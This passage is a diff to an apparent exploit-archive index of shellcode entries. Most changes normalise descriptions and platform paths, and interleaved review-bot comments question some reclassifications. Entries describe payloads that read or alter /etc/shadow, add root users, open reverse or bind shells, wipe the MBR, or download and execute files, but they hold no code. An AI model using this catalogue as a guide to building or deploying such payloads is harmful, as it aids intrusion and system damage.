bytes)",2000-11-19,dopesquad.net,shellcode,solaris_sparc 13498,shellcodes/generator/13498.php,"Solaris/x86 - Bind TCP Shell Shellcode (Generator)",2009-06-16,"Jonathan Salwan",shellcode,generator -13499,shellcodes/solaris_x86/13499.c,"Solaris/x86 - setuid(0) + execve(//bin/sh) + exit(0) Null-Free Shellcode (39 bytes)",2008-12-02,sm4x,shellcode,solaris_x86 +13499,shellcodes/solaris_x86/13499.c,"Solaris/x86 - setuid(0) + execve(/bin/sh) + exit(0) Null-Free Shellcode (39 bytes)",2008-12-02,sm4x,shellcode,solaris_x86 13500,shellcodes/solaris_x86/13500.c,"Solaris/x86 - setuid(0) + execve(/bin/cat_ /etc/shadow) + exit(0) Shellcode (59 bytes)",2008-12-02,sm4x,shellcode,solaris_x86 -13501,shellcodes/solaris_x86/13501.txt,"Solaris/x86 - execve /bin/sh ToUpper Encoded Shellcode (84 bytes)",2004-09-26,anonymous,shellcode,solaris_x86 -13502,shellcodes/solaris_x86/13502.txt,"Solaris/x86 - inetd Add Service + execve Shellcode (201 bytes)",2004-09-26,anonymous,shellcode,solaris_x86 
-13503,shellcodes/unixware/13503.txt,"UnixWare - execve /bin/sh Shellcode (95 bytes)",2004-09-26,K2,shellcode,unixware +13501,shellcodes/solaris_x86/13501.txt,"Solaris/x86 - execve(/bin/sh) ToUpper Encoded Shellcode (84 bytes)",2004-09-26,anonymous,shellcode,solaris_x86 +13502,shellcodes/solaris_x86/13502.txt,"Solaris/x86 - inetd Add Service + execve() Shellcode (201 bytes)",2004-09-26,anonymous,shellcode,solaris_x86 +13503,shellcodes/unixware/13503.txt,"UnixWare - execve(/bin/sh) Shellcode (95 bytes)",2004-09-26,K2,shellcode,unixware 13504,shellcodes/windows_x86/13504.asm,"Windows 5.0 < 7.0 x86 - Bind TCP (28876/TCP) Shell + Null-Free Shellcode",2009-07-27,Skylined,shellcode,windows_x86 13505,shellcodes/windows_x86/13505.c,"Windows XP SP2 x86 (English) - cmd.exe Shellcode (23 bytes)",2009-07-17,Stack,shellcode,windows_x86 13507,shellcodes/windows_x86/13507.txt,"Windows x86 - Egg Omelet SEH Shellcode",2009-03-16,Skylined,shellcode,windows_x86 
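Review bot: The reclassification of entries 13489 and 13491 from Solaris/SPARC to Solaris/MIPS (new path `shellcodes/solaris_mips/13489.c` and the "Solaris/MIPS" descriptions) looks suspect, because Solaris was never released for MIPS; if the source files' own headers still say SPARC, as the old descriptions did, the platform column and the directory move should be reverted rather than propagated. The same hunk changes the size of 13452 from 34 to 28 bytes, moves 13426, 13430 and 13453 to `bsd_x86`, and inserts 43633 between 13452 and 13453 out of id order, all of which are fine only if they match the files they index, so they deserve the same check. Since this is the catalog rather than code, the cost of a wrong platform value is that searches and tooling keyed on the platform column silently miss the entry.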
@@ -291,7 +292,7 @@ id,file,description,date,author,type,platform 13549,shellcodes/linux_x86/13549.c,"Linux/x86 - setuid(0) + execve(_/sbin/poweroff -f_) Shellcode (47 bytes)",2009-12-04,ka0x,shellcode,linux_x86 13550,shellcodes/linux_x86/13550.c,"Linux/x86 - setuid(0) + /bin/cat /etc/shadow Shellcode (49 bytes)",2009-12-04,ka0x,shellcode,linux_x86 13551,shellcodes/linux_x86/13551.c,"Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (33 bytes)",2009-12-04,ka0x,shellcode,linux_x86 -13553,shellcodes/linux_x86/13553.c,"Linux/x86 - execve Shellcode (51 bytes)",2009-12-04,"fl0 fl0w",shellcode,linux_x86 +13553,shellcodes/linux_x86/13553.c,"Linux/x86 - execve() Shellcode (51 bytes)",2009-12-04,"fl0 fl0w",shellcode,linux_x86 13560,shellcodes/windows/13560.txt,"Windows XP SP2 - PEB ISbeingdebugged Beep Shellcode (56 bytes)",2009-12-14,anonymous,shellcode,windows 13563,shellcodes/linux_x86/13563.asm,"Linux/x86 - Overwrite MBR on /dev/sda with _LOL!' Shellcode (43 bytes)",2010-01-15,root@thegibson,shellcode,linux_x86 13565,shellcodes/windows_x86/13565.asm,"Windows XP SP3 x86 - ShellExecuteA Shellcode",2009-12-19,sinn3r,shellcode,windows_x86 
@@ -302,22 +303,22 @@ id,file,description,date,author,type,platform 13572,shellcodes/linux_x86/13572.c,"Linux/x86 - unlink(/etc/passwd) + exit() Shellcode (35 bytes)",2009-12-24,sandman,shellcode,linux_x86 13574,shellcodes/windows_x86/13574.c,"Windows XP SP2 x86 (English / Arabic) - cmd.exe Shellcode (23 bytes)",2009-12-28,"AnTi SeCuRe",shellcode,windows_x86 13576,shellcodes/linux_x86/13576.asm,"Linux/x86 - chmod 666 /etc/shadow Shellcode (27 bytes)",2010-01-16,root@thegibson,shellcode,linux_x86 -13577,shellcodes/linux_x86/13577.txt,"Linux/x86 - setuid + Break chroot (mkdir/chdir/chroot '...') + execve /bin/sh Shellcode (79 bytes)",2009-12-30,root@thegibson,shellcode,linux_x86 +13577,shellcodes/linux_x86/13577.txt,"Linux/x86 - setuid() + Break chroot (mkdir/chdir/chroot '...') + execve(/bin/sh) Shellcode (79 bytes)",2009-12-30,root@thegibson,shellcode,linux_x86 13578,shellcodes/linux_x86/13578.txt,"Linux/x86 - Fork Bomb Shellcode (6 bytes) (1)",2009-12-30,root@thegibson,shellcode,linux_x86 13579,shellcodes/linux_x86/13579.c,"Linux/x86 - Add Root User (toor) To /etc/passwd + exit() Shellcode (107 bytes)",2009-12-31,sandman,shellcode,linux_x86 13581,shellcodes/windows/13581.txt,"Windows XP Professional SP2 (English) - MessageBox Null-Free Shellcode (16 bytes)",2010-01-03,Aodrulez,shellcode,windows 13582,shellcodes/windows/13582.txt,"Windows XP Professional SP2 (English) - Wordpad Null-Free Shellcode (12 bytes)",2010-01-03,Aodrulez,shellcode,windows 13586,shellcodes/linux_x86/13586.txt,"Linux/x86 - Eject /dev/cdrom Shellcode (42 bytes)",2010-01-08,root@thegibson,shellcode,linux_x86 13595,shellcodes/windows_x86/13595.c,"Windows XP SP2 x86 (French) - calc Shellcode (19 bytes)",2010-01-20,SkuLL-HackeR,shellcode,windows_x86 -13599,shellcodes/linux_x86/13599.txt,"Linux/x86 - ip6tables -F Polymorphic Shellcode (71 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86 +13599,shellcodes/linux_x86/13599.txt,"Linux/x86 - ip6tables -F + Polymorphic Shellcode (71 
bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86 13600,shellcodes/linux_x86/13600.txt,"Linux/x86 - ip6tables -F Shellcode (47 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86 13601,shellcodes/linux_x86/13601.txt,"Linux/i686 - pacman -S (default package: backdoor) Shellcode (64 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86 13602,shellcodes/linux_x86/13602.txt,"Linux/i686 - pacman -R Shellcode (59 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86 -13609,shellcodes/linux_x86/13609.c,"Linux/x86 - execve /bin/cat /etc/passwd Shellcode (43 bytes)",2010-02-09,fb1h2s,shellcode,linux_x86 +13609,shellcodes/linux_x86/13609.c,"Linux/x86 - execve(/bin/cat /etc/passwd) Shellcode (43 bytes)",2010-02-09,fb1h2s,shellcode,linux_x86 13614,shellcodes/windows_x86/13614.c,"Windows XP SP3 x86 (English) - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",shellcode,windows_x86 13615,shellcodes/windows_x86/13615.c,"Windows XP SP2 x86 (Turkish) - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",shellcode,windows_x86 -13627,shellcodes/linux_x86/13627.c,"Linux/x86 - execve /bin/sh Shellcode (8 bytes)",2010-02-23,"JungHoon Shin",shellcode,linux_x86 -13628,shellcodes/linux_x86/13628.c,"Linux/x86 - execve /bin/sh Shellcode (21 bytes) (2)",2010-02-27,ipv,shellcode,linux_x86 +13627,shellcodes/linux_x86/13627.c,"Linux/x86 - execve(/bin/sh) Shellcode (8 bytes)",2010-02-23,"JungHoon Shin",shellcode,linux_x86 +13628,shellcodes/linux_x86/13628.c,"Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (2)",2010-02-27,ipv,shellcode,linux_x86 13630,shellcodes/windows_x86/13630.c,"Windows XP Home SP2 (English) - calc.exe Shellcode (37 bytes)",2010-02-28,"Hazem mofeed",shellcode,windows_x86 13631,shellcodes/windows_x86/13631.c,"Windows XP Home SP3 (English) - calc.exe Shellcode (37 bytes)",2010-03-01,"Hazem mofeed",shellcode,windows_x86 13632,shellcodes/linux_x86/13632.c,"Linux/x86 - Disable modsecurity Shellcode (64 
bytes)",2010-03-04,sekfault,shellcode,linux_x86 
@@ -331,21 +332,21 @@ id,file,description,date,author,type,platform 13649,shellcodes/windows/13649.txt,"Windows XP/Vista/7 - Egghunter JITed Stage-0 Adjusted Universal Shellcode",2010-03-27,"Alexey Sintsov",shellcode,windows 13661,shellcodes/linux_x86/13661.txt,"Linux/x86 - Bind TCP (13377/TCP) Netcat Shell Shellcode",2010-04-02,anonymous,shellcode,linux_x86 13669,shellcodes/linux_x86/13669.c,"Linux/x86 - chmod 0666 /etc/shadow Shellcode (36 bytes)",2010-04-14,Magnefikko,shellcode,linux_x86 -13670,shellcodes/linux_x86-64/13670.c,"Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) (2)",2010-04-14,Magnefikko,shellcode,linux_x86-64 +13670,shellcodes/linux_x86/13670.c,"Linux/x86 - execve(/bin/sh) Shellcode (25 bytes) (2)",2010-04-14,Magnefikko,shellcode,linux_x86 13671,shellcodes/linux_x86/13671.c,"Linux/x86 - DoS Badger Game Shellcode (6 bytes)",2010-04-14,Magnefikko,shellcode,linux_x86 13673,shellcodes/linux_x86/13673.c,"Linux/x86 - DoS SLoc Shellcode (55 bytes)",2010-04-14,Magnefikko,shellcode,linux_x86 13675,shellcodes/linux_x86/13675.c,"Linux/x86 - execve(_a->/bin/sh_) Local-only Shellcode (14 bytes)",2010-04-17,Magnefikko,shellcode,linux_x86 13676,shellcodes/linux_x86/13676.c,"Linux/x86 - chmod 0777 /etc/shadow Shellcode (33 bytes)",2010-04-18,sm0k,shellcode,linux_x86 13677,shellcodes/linux_x86/13677.c,"Linux/x86 - chmod 0777 /etc/shadow Shellcode (29 bytes)",2010-04-19,Magnefikko,shellcode,linux_x86 13679,shellcodes/generator/13679.py,"Linux - write() + exit(0) Shellcode (Generator)",2010-04-20,Stoke,shellcode,generator -13680,shellcodes/linux_x86/13680.c,"Linux/x86 - Fork Bomb Polymorphic Shellcode (30 bytes)",2010-04-21,"Jonathan Salwan",shellcode,linux_x86 +13680,shellcodes/linux_x86/13680.c,"Linux/x86 - Fork Bomb + Polymorphic Shellcode (30 bytes)",2010-04-21,"Jonathan Salwan",shellcode,linux_x86 13681,shellcodes/linux_x86/13681.c,"Linux/x86 - Fork Bomb Shellcode (6 bytes) (2)",2010-04-21,"Jonathan Salwan",shellcode,linux_x86 
13682,shellcodes/linux_x86/13682.c,"Linux/x86 - setreud(getuid()_ getuid()) + execve(_/bin/sh_) Shellcode (34 bytes)",2010-04-22,Magnefikko,shellcode,linux_x86 13688,shellcodes/linux_x86-64/13688.c,"Linux/x86-64 - reboot(POWER_OFF) Shellcode (19 bytes)",2010-04-25,zbt,shellcode,linux_x86-64 -13691,shellcodes/linux_x86-64/13691.c,"Linux/x86-64 - execve /bin/sh Shellcode (30 bytes)",2010-04-25,zbt,shellcode,linux_x86-64 +13691,shellcodes/linux_x86-64/13691.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (30 bytes)",2010-04-25,zbt,shellcode,linux_x86-64 13692,shellcodes/linux_x86/13692.c,"Linux/x86 - Sends 'Phuck3d!' To All Terminals Shellcode (60 bytes)",2010-04-25,condis,shellcode,linux_x86 13697,shellcodes/linux_x86/13697.c,"Linux/x86 - execve(_/bin/bash___-p__NULL) Shellcode (33 bytes)",2010-05-04,"Jonathan Salwan",shellcode,linux_x86 -13698,shellcodes/linux_x86/13698.c,"Linux/x86 - execve(_/bin/bash___-p__NULL) Polymorphic Shellcode (57 bytes)",2010-05-05,"Jonathan Salwan",shellcode,linux_x86 +13698,shellcodes/linux_x86/13698.c,"Linux/x86 - execve(_/bin/bash___-p__NULL) + Polymorphic Shellcode (57 bytes)",2010-05-05,"Jonathan Salwan",shellcode,linux_x86 13699,shellcodes/windows_x86/13699.txt,"Windows XP SP2 (French) - Download File (http://www.site.com/nc.exe_) + Execute (c:\backdor.exe) Shellcode",2010-05-10,Crack_MaN,shellcode,windows_x86 13702,shellcodes/linux_x86/13702.c,"Linux/x86 - execve(_/usr/bin/wget__ _aaaa_) Shellcode (42 bytes)",2010-05-17,"Jonathan Salwan",shellcode,linux_x86 13703,shellcodes/linux_x86/13703.txt,"Linux/x86 - sys_execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86 
@@ -357,12 +358,12 @@ id,file,description,date,author,type,platform 13715,shellcodes/linux_x86/13715.c,"Linux/x86 - pwrite(_/etc/shadow__ hash_ 32_ 8) Shellcode (83 bytes)",2010-05-27,agix,shellcode,linux_x86 13716,shellcodes/linux_x86/13716.c,"Linux/x86 - Fork Bomb Alphanumeric Shellcode (117 bytes)",2010-05-27,agix,shellcode,linux_x86 13719,shellcodes/windows_x86-64/13719.txt,"Windows 7 Professional SP1 x64 (FR) - Beep Shellcode (39 bytes)",2010-05-28,agix,shellcode,windows_x86-64 -13722,shellcodes/linux_x86/13722.c,"Linux/x86 - setuid(0) + chmod 0666 /etc/shadow Polymorphic Shellcode (61 bytes)",2010-05-31,antrhacks,shellcode,linux_x86 +13722,shellcodes/linux_x86/13722.c,"Linux/x86 - setuid(0) + chmod 0666 /etc/shadow + Polymorphic Shellcode (61 bytes)",2010-05-31,antrhacks,shellcode,linux_x86 13723,shellcodes/linux_x86/13723.c,"Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/shadow Shellcode (39 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86 13724,shellcodes/linux_x86/13724.c,"Linux/x86 - Kill All Running Process Shellcode (11 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86 13725,shellcodes/linux_x86/13725.txt,"Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/passwd Shellcode (39 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86 13726,shellcodes/linux_x86/13726.txt,"Linux/x86 - sys_execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86 -13728,shellcodes/linux_x86/13728.c,"Linux/x86 - sys_setuid(0) + sys_setgid(0) + execve (_/bin/sh_) Shellcode (39 bytes)",2010-06-01,gunslinger_,shellcode,linux_x86 +13728,shellcodes/linux_x86/13728.c,"Linux/x86 - sys_setuid(0) + sys_setgid(0) + execve(_/bin/sh_) Shellcode (39 bytes)",2010-06-01,gunslinger_,shellcode,linux_x86 13729,shellcodes/windows_x86-64/13729.txt,"Windows 7 x64 - cmd Shellcode (61 bytes)",2010-06-01,agix,shellcode,windows_x86-64 13730,shellcodes/linux_x86/13730.c,"Linux/x86 - unlink _/etc/shadow_ Shellcode (33 
bytes)",2010-06-02,gunslinger_,shellcode,linux_x86 13731,shellcodes/linux_x86/13731.c,"Linux/x86 - Hard Reboot Shellcode (29 bytes)",2010-06-03,gunslinger_,shellcode,linux_x86 
@@ -381,29 +382,29 @@ id,file,description,date,author,type,platform
 14116,shellcodes/arm/14116.txt,"Linux/ARM - setuid(0) + kill(-1_ SIGKILL) Shellcode (28 bytes)",2010-06-29,"Jonathan Salwan",shellcode,arm
 14052,shellcodes/windows/14052.c,"Windows - cmd.exe + ExitProcess WinExec Shellcode (195 bytes)",2010-06-25,RubberDuck,shellcode,windows
 14097,shellcodes/arm/14097.c,"Linux/ARM - execve(_/bin/sh___/bin/sh__0) Shellcode (30 bytes)",2010-06-28,"Jonathan Salwan",shellcode,arm
-14119,shellcodes/linux_x86/14119.c,"Linux/x86 - execve /bin/sh Polymorphic Shellcode (116 bytes)",2010-06-29,gunslinger_,shellcode,linux_x86
-14142,shellcodes/arm/14142.c,"Linux/ARM - chmod 0777 /etc/shadow Polymorphic Shellcode (84 bytes)",2010-06-30,"Florian Gaultier",shellcode,arm
+14119,shellcodes/linux_x86/14119.c,"Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (116 bytes)",2010-06-29,gunslinger_,shellcode,linux_x86
+14142,shellcodes/arm/14142.c,"Linux/ARM - chmod 0777 /etc/shadow + Polymorphic Shellcode (84 bytes)",2010-06-30,"Florian Gaultier",shellcode,arm
 14122,shellcodes/arm/14122.txt,"Linux/ARM - chmod 0777 /etc/shadow Shellcode (35 bytes)",2010-06-29,"Florian Gaultier",shellcode,arm
 14139,shellcodes/arm/14139.c,"Linux/ARM - Disable ASLR Security Shellcode (102 bytes)",2010-06-30,"Jonathan Salwan",shellcode,arm
-14190,shellcodes/arm/14190.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) XOR 88 Encoded Polymorphic Shellcode (78 bytes)",2010-07-03,"Jonathan Salwan",shellcode,arm
+14190,shellcodes/arm/14190.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) + XOR 88 Encoded + Polymorphic Shellcode (78 bytes)",2010-07-03,"Jonathan Salwan",shellcode,arm
 14216,shellcodes/linux_x86/14216.c,"Linux/x86 - Bind TCP (64533/TCP) Shell (/bin/sh) Shellcode (97 bytes)",2010-07-05,Magnefikko,shellcode,linux_x86
-14218,shellcodes/linux/14218.c,"Linux - Write SUID Root Shell (/tmp/.hiddenshell) Polymorphic Shellcode (161 bytes)",2010-07-05,gunslinger_,shellcode,linux
+14218,shellcodes/linux/14218.c,"Linux - Write SUID Root Shell (/tmp/.hiddenshell) + Polymorphic Shellcode (161 bytes)",2010-07-05,gunslinger_,shellcode,linux
 14219,shellcodes/linux/14219.c,"Linux - setreuid(0_0) + execve(_/bin/sh__NULL_NULL) XOR Encoded Shellcode (62 bytes)",2010-07-05,gunslinger_,shellcode,linux
 14221,shellcodes/windows/14221.html,"Safari 4.0.5 < 5.0.0 (Windows XP/7) - JavaScript JITed exec calc (ASLR/DEP Bypass) Null-Free Shellcode",2010-07-05,"Alexey Sintsov",shellcode,windows
-14234,shellcodes/linux/14234.c,"Linux - Bind TCP (6778/TCP) Shell + XOR Encoded Polymorphic Shellcode (125 bytes)",2010-07-05,gunslinger_,shellcode,linux
+14234,shellcodes/linux_x86/14234.c,"Linux/x86 - Bind TCP (6778/TCP) Shell + XOR Encoded + Polymorphic Shellcode (125 bytes)",2010-07-05,gunslinger_,shellcode,linux_x86
 14235,shellcodes/linux/14235.c,"Linux - Bind TCP (31337/TCP) Netcat Shell + Polymorphic Shellcode (91 bytes)",2010-07-05,gunslinger_,shellcode,linux
-14261,shellcodes/generator/14261.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Polymorphic Shellcode (Generator)",2010-07-07,"Jonathan Salwan",shellcode,generator
-14276,shellcodes/linux/14276.c,"Linux - Find All Writeable Folder In FileSystem Polymorphic Shellcode (91 bytes)",2010-07-08,gunslinger_,shellcode,linux
+14261,shellcodes/generator/14261.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) + Polymorphic Shellcode (Generator)",2010-07-07,"Jonathan Salwan",shellcode,generator
+14276,shellcodes/linux_x86/14276.c,"Linux/x86 - Find All Writeable Folder In FileSystem + Polymorphic Shellcode (91 bytes)",2010-07-08,gunslinger_,shellcode,linux_x86
 14288,shellcodes/windows_x86/14288.asm,"Windows x86 - Write-to-file ('pwned' ./f.txt) Null-Free Shellcode (278 bytes)",2010-07-09,"Brett Gervasoni",shellcode,windows_x86
-14305,shellcodes/linux_x86-64/14305.c,"Linux/x86-64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) Shellcode (49 bytes)",2010-07-09,10n1z3d,shellcode,linux_x86-64
+14305,shellcodes/linux_x86-64/14305.c,"Linux/x86-64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (49 bytes)",2010-07-09,10n1z3d,shellcode,linux_x86-64
 14332,shellcodes/linux_x86/14332.c,"Linux/x86 - Bind TCP (8080/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (75 bytes)",2010-07-11,blake,shellcode,linux_x86
-14691,shellcodes/linux_x86/14691.c,"Linux/x86 - execve /bin/sh Polymorphic Null-Free Shellcode (46 bytes)",2010-08-19,Aodrulez,shellcode,linux_x86
+14691,shellcodes/linux_x86/14691.c,"Linux/x86 - execve(/bin/sh) + Polymorphic Null-Free Shellcode (46 bytes)",2010-08-19,Aodrulez,shellcode,linux_x86
 14697,shellcodes/windows/14697.c,"Windows XP SP3 (English) - MessageBoxA Shellcode (87 bytes)",2010-08-20,"Glafkos Charalambous",shellcode,windows
 14795,shellcodes/bsd_x86/14795.c,"BSD/x86 - Bind TCP (2525/TCP) Shell Shellcode (167 bytes)",2010-08-25,beosroot,shellcode,bsd_x86
 14873,shellcodes/windows_x86/14873.asm,"Windows x86 - Egghunter Checksum Routine Shellcode (18 bytes)",2010-09-02,dijital1,shellcode,windows_x86
 14907,shellcodes/arm/14907.c,"Linux/ARM - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (27 bytes)",2010-09-05,"Jonathan Salwan",shellcode,arm
 15063,shellcodes/windows_x86/15063.c,"Windows XP SP3 x86 (Turkish) - Add Administrator User (zrl/123456) Shellcode (127 bytes)",2010-09-20,ZoRLu,shellcode,windows_x86
-15116,shellcodes/windows/15116.cpp,"Windows Mobile 6.5 TR (WinCE 5.2) - MessageBox Shellcode (ARM)",2010-09-26,"Celil Ünüver",shellcode,windows
+15116,shellcodes/arm/15116.cpp,"Windows Mobile 6.5 TR (WinCE 5.2)/ARM - MessageBox Shellcode",2010-09-26,"Celil Ünüver",shellcode,arm
 15136,shellcodes/windows/15136.cpp,"Windows Mobile 6.5 TR - Phone Call Shellcode",2010-09-27,"Celil Ünüver",shellcode,windows
 15202,shellcodes/windows_x86/15202.c,"Windows XP Professional SP3 x86 (English) - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes)",2010-10-04,"Anastasios Monachos",shellcode,windows_x86
 15203,shellcodes/windows_x86/15203.c,"Windows x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes)",2010-10-04,"Anastasios Monachos",shellcode,windows_x86
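Review bot: The reclassification of 15116 from `shellcodes/windows` to `shellcodes/arm` (platform `arm`) leaves its sibling 15136 — the same Windows Mobile 6.5 TR target by the same author, one line below — still filed under `shellcodes/windows` with platform `windows`, so the two WinCE entries now disagree on how that platform is catalogued. If 15136 targets the same ARM build, the consistent line would be `15136,shellcodes/arm/15136.cpp,"Windows Mobile 6.5 TR/ARM - Phone Call Shellcode",2010-09-27,"Celil Ünüver",shellcode,arm`; if it does not, the 15116 move should be re-checked against its source instead. The path changes for 14234, 14276 and 15116 also make the index resolvable only if the matching file moves are part of the same commit, which this hunk does not show. The remaining hunks in this file change description text only.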
@@ -412,15 +413,15 @@ id,file,description,date,author,type,platform
 15316,shellcodes/arm/15316.asm,"Linux/ARM - Bind TCP Listener (0x1337/TCP) + Receive Shellcode + Payload Loader Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
 15317,shellcodes/arm/15317.asm,"Linux/ARM - ifconfig eth0 192.168.0.2 up Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
 15616,shellcodes/arm/15616.c,"Linux/ARM - Add Root User (shell-storm/toor) Shellcode (151 bytes)",2010-11-25,"Jonathan Salwan",shellcode,arm
-15618,shellcodes/osx/15618.c,"OSX/Intel x86-64 - setuid shell Shellcode (51 bytes)",2010-11-25,"Dustin Schultz",shellcode,osx
+15618,shellcodes/osx/15618.c,"OSX/x86-64 - setuid() + Shell(/bin/sh) Shellcode (51 bytes)",2010-11-25,"Dustin Schultz",shellcode,osx
 15712,shellcodes/generator/15712.rb,"ARM - Add Root User Shellcode (Metasploit) (66+ bytes) (Generator)",2010-12-09,"Jonathan Salwan",shellcode,generator
 15879,shellcodes/windows_x86/15879.txt,"Windows 5.0 < 7.0 x86 - Speaking 'You got pwned!' Null-Free Shellcode",2010-12-31,Skylined,shellcode,windows_x86
 16025,shellcodes/generator/16025.c,"FreeBSD/x86 - Reverse TCP (127.0.0.1:1337/TCP) Shell (/bin/sh) Shellcode (81 bytes) (Generator)",2011-01-21,Tosh,shellcode,generator
 16026,shellcodes/freebsd_x86/16026.c,"FreeBSD/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + Fork Shellcode (111 bytes)",2011-01-21,Tosh,shellcode,freebsd_x86
 16283,shellcodes/windows_x86/16283.txt,"Windows x86 - Eggsearch Shellcode (33 bytes)",2011-03-05,oxff,shellcode,windows_x86
 17432,shellcodes/superh_sh4/17432.c,"Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes)",2011-06-22,"Jonathan Salwan",shellcode,superh_sh4
-17194,shellcodes/linux_x86/17194.txt,"Linux/x86 - Bind TCP (6666/TCP) Netcat (/usr/bin/netcat) Shell (/bin/sh) + Polymorphic XOR Encoded Shellcode (69/93 bytes)",2011-04-21,"Jonathan Salwan",shellcode,linux_x86
-17224,shellcodes/osx/17224.s,"OSX/Intel x86-64 - Reverse TCP (FFFFFFFF:4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2011-04-29,hammackj,shellcode,osx
+17194,shellcodes/linux_x86/17194.txt,"Linux/x86 - Bind TCP (6666/TCP) Netcat (/usr/bin/netcat) Shell (/bin/sh) + Polymorphic + XOR Encoded Shellcode (69/93 bytes)",2011-04-21,"Jonathan Salwan",shellcode,linux_x86
+17224,shellcodes/osx/17224.s,"OSX/x86-64 - Reverse TCP (FFFFFFFF:4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2011-04-29,hammackj,shellcode,osx
 17323,shellcodes/windows/17323.c,"Windows - Add Local Administrator User (RubberDuck/mudbath) + ExitProcess WinExec Shellcode (279 bytes)",2011-05-25,RubberDuck,shellcode,windows
 20195,shellcodes/linux_x86/20195.c,"Linux/x86 - Disable ASLR Security Shellcode (83 bytes)",2012-08-02,"Jean Pascal Pereira",shellcode,linux_x86
 17326,shellcodes/generator/17326.rb,"Windows - Download File + Execute via DNS (IPv6) Shellcode (Generator) (Metasploit)",2011-05-26,"Alexey Sintsov",shellcode,generator
@@ -428,19 +429,19 @@ id,file,description,date,author,type,platform
 17439,shellcodes/superh_sh4/17439.c,"Linux/SuperH (sh4) - Add Root User (shell-storm/toor) Shellcode (143 bytes)",2011-06-23,"Jonathan Salwan",shellcode,superh_sh4
 17545,shellcodes/windows_x86/17545.txt,"Windows PerfectXp-pc1/SP3 x86 (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes)",2011-07-18,KaHPeSeSe,shellcode,windows_x86
 17559,shellcodes/linux_x86/17559.c,"Linux/x86 - Egghunter Null-Free Shellcode (29 bytes)",2011-07-21,"Ali Raheem",shellcode,linux_x86
-17564,shellcodes/osx/17564.asm,"OSX - Universal ROP + Reverse TCP Shell Shellcode",2011-07-24,pa_kt,shellcode,osx
-17940,shellcodes/linux_mips/17940.c,"Linux/MIPS - execve /bin/sh Shellcode (52 bytes)",2011-10-07,entropy,shellcode,linux_mips
+17564,shellcodes/osx/17564.asm,"OSX/x86-64 - Universal ROP + Reverse TCP Shell Shellcode",2011-07-24,pa_kt,shellcode,osx
+17940,shellcodes/linux_mips/17940.c,"Linux/MIPS - execve(/bin/sh) Shellcode (52 bytes)",2011-10-07,entropy,shellcode,linux_mips
 17996,shellcodes/generator/17996.c,"Linux/MIPS - XOR Encoder Shellcode (60 bytes) (Generator)",2011-10-18,entropy,shellcode,generator
 18154,shellcodes/superh_sh4/18154.c,"Linux/SuperH (sh4) - setuid(0) + execve(_/bin/sh__ NULL_ NULL) Shellcode (27 bytes)",2011-11-24,"Jonathan Salwan",shellcode,superh_sh4
-18162,shellcodes/linux_mips/18162.c,"Linux/MIPS - execve /bin/sh Shellcode (48 bytes)",2011-11-27,rigan,shellcode,linux_mips
+18162,shellcodes/linux_mips/18162.c,"Linux/MIPS - execve(/bin/sh) Shellcode (48 bytes)",2011-11-27,rigan,shellcode,linux_mips
 18163,shellcodes/linux_mips/18163.c,"Linux/MIPS - Add Root User (rOOt/pwn3d) Shellcode (164 bytes)",2011-11-27,rigan,shellcode,linux_mips
-18197,shellcodes/linux_x86-64/18197.c,"Linux/x86-64 - execve /bin/sh Shellcode (52 bytes)",2011-12-03,X-h4ck,shellcode,linux_x86-64
+18197,shellcodes/linux_x86-64/18197.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (52 bytes)",2011-12-03,X-h4ck,shellcode,linux_x86-64
 18226,shellcodes/linux_mips/18226.c,"Linux/MIPS - Reverse TCP (0x7a69/TCP) Shell Shellcode (168 bytes)",2011-12-10,rigan,shellcode,linux_mips
 18227,shellcodes/linux_mips/18227.c,"Linux/MIPS - reboot() Shellcode (32 bytes)",2011-12-10,rigan,shellcode,linux_mips
-18294,shellcodes/linux_x86/18294.c,"Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd Polymorphic Shellcode",2011-12-31,pentesters.ir,shellcode,linux_x86
+18294,shellcodes/linux_x86/18294.c,"Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd + Polymorphic Shellcode",2011-12-31,pentesters.ir,shellcode,linux_x86
